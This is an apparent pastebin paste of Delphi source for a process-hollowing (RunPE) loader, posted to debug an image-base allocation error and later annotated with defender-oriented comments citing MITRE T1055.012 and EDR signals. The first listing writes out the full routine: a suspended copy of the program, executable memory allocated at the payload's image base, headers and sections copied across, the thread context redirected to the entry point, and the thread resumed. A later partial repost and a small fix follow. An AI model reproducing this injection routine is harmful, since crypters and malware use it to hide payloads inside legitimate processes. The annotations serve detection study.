
Untitled

By: a guest on May 10th, 2012  |  syntax: None  |  size: 2.35 KB  |  hits: 15  |  expires: Never
  1. Imagebase error in Delphi EXE
  2. {$R *.dfm}
  3.  
  4. procedure TForm1.Button1Click(Sender: TObject);
       // Click handler. Reads 'calc.exe' (relative path) into the eu buffer, starts a
       // second instance of this program (ParamStr(0)) with its main thread
       // suspended, copies the PE headers and sections of the loaded file into that
       // process, points the suspended thread's context at the copied image's entry
       // point, and resumes the thread.
       //
       // Defender's view: CREATE_SUSPENDED -> cross-process VirtualAllocEx with
       // PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> SetThreadContext ->
       // ResumeThread is the API sequence commonly catalogued as process hollowing /
       // RunPE (MITRE ATT&CK T1055.012). It is a strong behavioural signal for EDR
       // products and for Sysmon's ProcessTampering event.
       //
       // NOTE(review): FS, eu, SInfo, PInfo, IDH, INH, ISH, CONT, imgbase and btsIO
       // are declared outside this listing. No API return value is checked anywhere
       // in this handler, so every step after a failure runs on stale or zero values.
  5. var
  6.   i: Integer;
  7. begin
       // Load the whole file into eu. There is no try/finally, so FS is not freed
       // if Read raises.
  8.   FS := TFileStream.Create('calc.exe', fmOpenRead or fmShareDenyNone);
  9.   SetLength(eu, FS.Size);
  10.   FS.Read(eu[0], FS.Size);
  11.   FS.Free;
        // Only cb is assigned here; whether the remaining TStartupInfo fields are
        // zero depends on how SInfo is declared -- TODO confirm.
  12.   SInfo.cb := Sizeof(TStartupInfo);
        // The command line is this program's own path; the child is created with
        // its main thread suspended. The Boolean result is ignored.
  13.   CreateProcess(nil, Pchar(paramstr(0)), nil, nil, FALSE, CREATE_SUSPENDED, nil,
  14.     nil, SInfo, PInfo);
        // Header pointers are taken straight from the file bytes: IDH at offset 0,
        // INH at offset _lfanew. _lfanew is not validated against Length(eu).
  15.   IDH := @eu[0];
  16.   INH := @eu[IDH^._lfanew];
        // Requests read/write/execute memory inside the child at the loaded file's
        // OptionalHeader.ImageBase, sized SizeOfImage. VirtualAllocEx returns nil
        // when the request cannot be satisfied, so imgbase can be 0 at this point;
        // the ShowMessage below displays whatever came back. The DWORD cast assumes
        // 32-bit pointers.
  17.   imgbase := DWORD(VirtualAllocEx(PInfo.hProcess,
  18.     Ptr(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage,
  19.     MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE));
  20.   ShowMessage(IntToHex(imgbase, 8));
        // Copies SizeOfHeaders bytes from the start of eu to the start of the
        // allocation in the child.
  21.   WriteProcessMemory(PInfo.hProcess, Ptr(imgbase), @eu[0],
  22.     INH^.OptionalHeader.SizeOfHeaders, SIZE_T(btsIO));
        // One remote write per section header: SizeOfRawData bytes from file offset
        // PointerToRawData go to imgbase + VirtualAddress. Both header fields are
        // used without bounds checks against eu.
  23.   for i := 0 to INH^.FileHeader.NumberOfSections - 1 do
  24.   begin
  25.     ISH := @eu[IDH^._lfanew + Sizeof(TImageNtHeaders) + i *
  26.       Sizeof(TImageSectionHeader)];
  27.     WriteProcessMemory(PInfo.hProcess, Ptr(imgbase + ISH^.VirtualAddress),
  28.       @eu[ISH^.PointerToRawData], ISH^.SizeOfRawData, SIZE_T(btsIO));
  29.   end;
        // Reads the suspended thread's register context and replaces Eax with the
        // address of the copied image's entry point. Eax/Ebx are x86-only fields.
  30.   CONT.ContextFlags := CONTEXT_FULL;
  31.   GetThreadContext(PInfo.hThread, CONT);
  32.   CONT.Eax := imgbase + INH^.OptionalHeader.AddressOfEntryPoint;
        // Writes the 4-byte imgbase value to address (Ebx + 8) in the child --
        // presumably the image-base field of the PEB on 32-bit Windows; confirm.
  33.   WriteProcessMemory(PInfo.hProcess, Ptr(CONT.Ebx + 8), @imgbase, 4,
  34.     SIZE_T(btsIO));
  35.   ShowMessage('Press ok on ENTER');
        // Applies the edited context, lets the thread run, then closes both handles
        // returned in PInfo.
  36.   SetThreadContext(PInfo.hThread, CONT);
  37.   ResumeThread(PInfo.hThread);
  38.   CloseHandle(PInfo.hThread);
  39.   CloseHandle(PInfo.hProcess);
  40. end;
  41.        
  42. {$R *.dfm}
  43.     {$R test.res}  //extra resource added
  44.  
  45.         procedure TForm1.Button1Click(Sender: TObject);
              // Second posting of the same click handler, this time from a build that
              // also links test.res. The visible statements match the first listing
              // line for line; the author elided everything after the ShowMessage.
              // Defender's view: a suspended child process followed by a cross-process
              // PAGE_EXECUTE_READWRITE allocation is already a high-signal pair for
              // behavioural monitoring, before any remote write occurs.
  46.         var
  47.           i: Integer;
  48.         begin
              // Reads 'calc.exe' fully into eu; FS is not protected by try/finally.
  49.           FS := TFileStream.Create('calc.exe', fmOpenRead or fmShareDenyNone);
  50.           SetLength(eu, FS.Size);
  51.           FS.Read(eu[0], FS.Size);
  52.           FS.Free;
              // Only cb is set; the other SInfo fields depend on its declaration, which
              // is not shown -- TODO confirm. The CreateProcess result is ignored.
  53.           SInfo.cb := Sizeof(TStartupInfo);
  54.           CreateProcess(nil, Pchar(paramstr(0)), nil, nil, FALSE, CREATE_SUSPENDED, nil,
  55.             nil, SInfo, PInfo);
  56.           IDH := @eu[0];
  57.           INH := @eu[IDH^._lfanew];
              // The allocation result is used unchecked: VirtualAllocEx returns nil on
              // failure, in which case imgbase is 0 and the message box shows 00000000.
  58.           imgbase := DWORD(VirtualAllocEx(PInfo.hProcess,
  59.             Ptr(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage,
  60.             MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE));
  61.           ShowMessage(IntToHex(imgbase, 8));
  62. .....
  63. .....
  64.        
  65. ..
  66. FillChar(SInfo, SizeOf(SInfo), 0);  // zero every byte of SInfo before any field is assigned
  67. SInfo.cb := Sizeof(TStartupInfo);  // cb is then the only non-zero field passed to CreateProcess
  68. CreateProcess(...  // arguments elided by the author
  69. ..